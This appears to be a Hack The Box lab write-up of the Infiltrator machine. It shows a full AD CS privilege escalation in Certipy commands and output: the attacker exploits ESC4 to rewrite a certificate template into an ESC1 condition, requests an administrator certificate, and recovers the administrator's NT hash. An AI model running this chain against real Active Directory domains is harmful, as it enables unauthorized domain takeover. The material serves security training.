ADCS
The presence of ADCS was initially discovered by enumerating the RPC endpoints. It was then confirmed during a manual system enumeration upon the initial foothold. One of the automated enumeration script, adPEAS, then was able to pick it up and even identified a vulnerable template. The identified vulnerable template, Infiltrator_Template, includes the ENROLLEE_SUPPLIES_SUBJECT attribute and has been granted permissions to the infiltrator_svc$ account for extended usage. Given that the infiltrator_svc$ account has been compromised, I will be able to move forward with this.
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=../infiltrator_svc\$@dc01.infiltrator.htb.ccache certipy-ad find -vulnerable -target dc01.infiltrator.htb -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via RRP: The NETBIOS connection with the remote host timed out.
[!] Failed to get CA configuration for 'infiltrator-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : infiltrator-DC01-CA
DNS Name : dc01.infiltrator.htb
Certificate Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Certificate Serial Number : 724BCC4E21EA6681495514E0FD8A5149
Certificate Validity Start : 2023-12-08 01:42:38+00:00
Certificate Validity End : 2124-08-04 18:55:57+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates
0
Template Name : Infiltrator_Template
Display Name : Infiltrator_Template
Certificate Authorities : infiltrator-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
PendAllRequests
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Smart Card Logon
Server Authentication
KDC Authentication
Client Authentication
Requires Manager Approval : True
Requires Key Archival : False
Authorized Signatures Required : 1
Validity Period : 99 years
Renewal Period : 650430 hours
Minimum RSA Key Length : 2048
Permissions
Object Control Permissions
Owner : INFILTRATOR.HTB\Local System
Full Control Principals : INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
Write Owner Principals : INFILTRATOR.HTB\infiltrator_svc
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
Write Dacl Principals : INFILTRATOR.HTB\infiltrator_svc
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
Write Property Principals : INFILTRATOR.HTB\infiltrator_svc
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
[!] Vulnerabilities
ESC4 : 'INFILTRATOR.HTB\\infiltrator_svc' has dangerous permissionscertipy-ad indeed picks up the vulnerable template, Infiltrator_Template, and identified the vulnerability; ESC4
ESC4
The ESC4 vulnerability in Active Directory Certificate Services (AD CS) allows attackers to abuse misconfigured certificate templates to escalate privileges. By leveraging templates that enable the ENROLLEE_SUPPLIES_SUBJECT attribute, attackers can request certificates for any user, including high-privilege accounts, potentially gaining unauthorized access to sensitive systems. This vulnerability is particularly critical when permissions for such templates are granted to low-privilege accounts.
ESC4 is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=../infiltrator_svc\$@dc01.infiltrator.htb.ccache certipy-ad template -template 'Infiltrator_Template' -target dc01.infiltrator.htb -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: INFILTRATOR.HTB
[+] Username retrieved from CCache: infiltrator_svc$
[+] Trying to resolve 'dc01.infiltrator.htb' at '10.129.180.75'
[+] Authenticating to LDAP server
[+] Using Kerberos Cache: ../infiltrator_svc$@dc01.infiltrator.htb.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache: infiltrator_svc$
[+] Getting TGS for 'host/dc01.infiltrator.htb'
[+] Got TGS for 'host/dc01.infiltrator.htb'
[+] Bound to ldaps://10.129.180.75:636 - ssl
[+] Default path: DC=infiltrator,DC=htb
[+] Configuration path: CN=Configuration,DC=infiltrator,DC=htb
[*] Updating certificate template 'Infiltrator_Template'
[+] MODIFY_DELETE:
[+] pKIExtendedKeyUsage: []
[+] msPKI-Certificate-Application-Policy: []
[+] MODIFY_REPLACE:
[+] nTSecurityDescriptor: [b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00']
[+] flags: [b'0']
[+] pKIDefaultKeySpec: [b'2']
[+] pKIKeyUsage: [b'\x86\x00']
[+] pKIMaxIssuingDepth: [b'-1']
[+] pKICriticalExtensions: [b'2.5.29.19', b'2.5.29.15']
[+] pKIExpirationPeriod: [b'\x00@\x1e\xa4\xe8e\xfa\xff']
[+] pKIOverlapPeriod: [b'\x00\x80\xa6\n\xff\xde\xff\xff']
[+] pKIDefaultCSPs: [b'1,Microsoft Enhanced Cryptographic Provider v1.0']
[+] msPKI-RA-Signature: [b'0']
[+] msPKI-Enrollment-Flag: [b'0']
[*] Successfully updated 'Infiltrator_Template'The Infiltrator_Template template is now vulnerable to ESC1
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=../infiltrator_svc\$@dc01.infiltrator.htb.ccache certipy-ad find -vulnerable -target dc01.infiltrator.htb -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP
[*] Got CA configuration for 'infiltrator-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : infiltrator-DC01-CA
DNS Name : dc01.infiltrator.htb
Certificate Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Certificate Serial Number : 724BCC4E21EA6681495514E0FD8A5149
Certificate Validity Start : 2023-12-08 01:42:38+00:00
Certificate Validity End : 2124-08-04 18:55:57+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : INFILTRATOR.HTB\Administrators
Access Rights
ManageCertificates : INFILTRATOR.HTB\Administrators
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
ManageCa : INFILTRATOR.HTB\Administrators
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
Enroll : INFILTRATOR.HTB\Authenticated Users
Certificate Templates
0
Template Name : Infiltrator_Template
Display Name : Infiltrator_Template
Certificate Authorities : infiltrator-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : ExportableKey
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 5 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Object Control Permissions
Owner : INFILTRATOR.HTB\Local System
Full Control Principals : INFILTRATOR.HTB\Authenticated Users
Write Owner Principals : INFILTRATOR.HTB\Authenticated Users
Write Dacl Principals : INFILTRATOR.HTB\Authenticated Users
Write Property Principals : INFILTRATOR.HTB\Authenticated Users
[!] Vulnerabilities
ESC1 : 'INFILTRATOR.HTB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2 : 'INFILTRATOR.HTB\\Authenticated Users' can enroll and template can be used for any purpose
ESC3 : 'INFILTRATOR.HTB\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4 : 'INFILTRATOR.HTB\\Authenticated Users' has dangerous permissionsConfirmed. Now anyone can enroll; ESC1
ESC1
The ESC1 vulnerability in Active Directory Certificate Services (AD CS) allows attackers to exploit misconfigured certificate templates that permit any authenticated user to request certificates. If such templates are configured to allow for certificate issuance without sufficient restrictions, attackers can obtain a certificate for an account they control, which can then be used for authentication and privilege escalation. This vulnerability is especially dangerous when default settings are left unchanged or improperly configured.
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=../infiltrator_svc\$@dc01.infiltrator.htb.ccache certipy-ad req -template 'Infiltrator_Template' -ca 'infiltrator-DC01-CA' -upn administrator@infiltrator.htb -target dc01.infiltrator.htb -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: INFILTRATOR.HTB
[+] Username retrieved from CCache: infiltrator_svc$
[+] Trying to resolve 'dc01.infiltrator.htb' at '10.129.180.75'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Using Kerberos Cache: ../infiltrator_svc$@dc01.infiltrator.htb.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache: infiltrator_svc$
[+] Getting TGS for 'host/dc01.infiltrator.htb'
[+] Got TGS for 'host/dc01.infiltrator.htb'
[+] Trying to connect to endpoint: ncacn_np:10.129.180.75[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.180.75[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'administrator@infiltrator.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'Successfully requested a template as the administrator user
PFX file generated for the administrator user
Authentication
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ certipy-ad auth -domain INFILTRATOR -username administrator -pfx administrator.pfx -k -dns-tcp -ns $IP -dc-ip $IP -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@infiltrator
[*] Trying to get TGT...
[*] Got TGT
[*] Saved Kirbi file to 'administrator.kirbi'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@infiltrator': aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1Retrieved the TGT of the administrator user
Validation
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ impacket-getTGT INFILTRATOR.HTB/administrator@dc01.infiltrator.htb -hashes aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1 -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in administrator@dc01.infiltrator.htb.ccacheValidated
TGT generated for the administrator user
Moving on to Privilege Escalation phase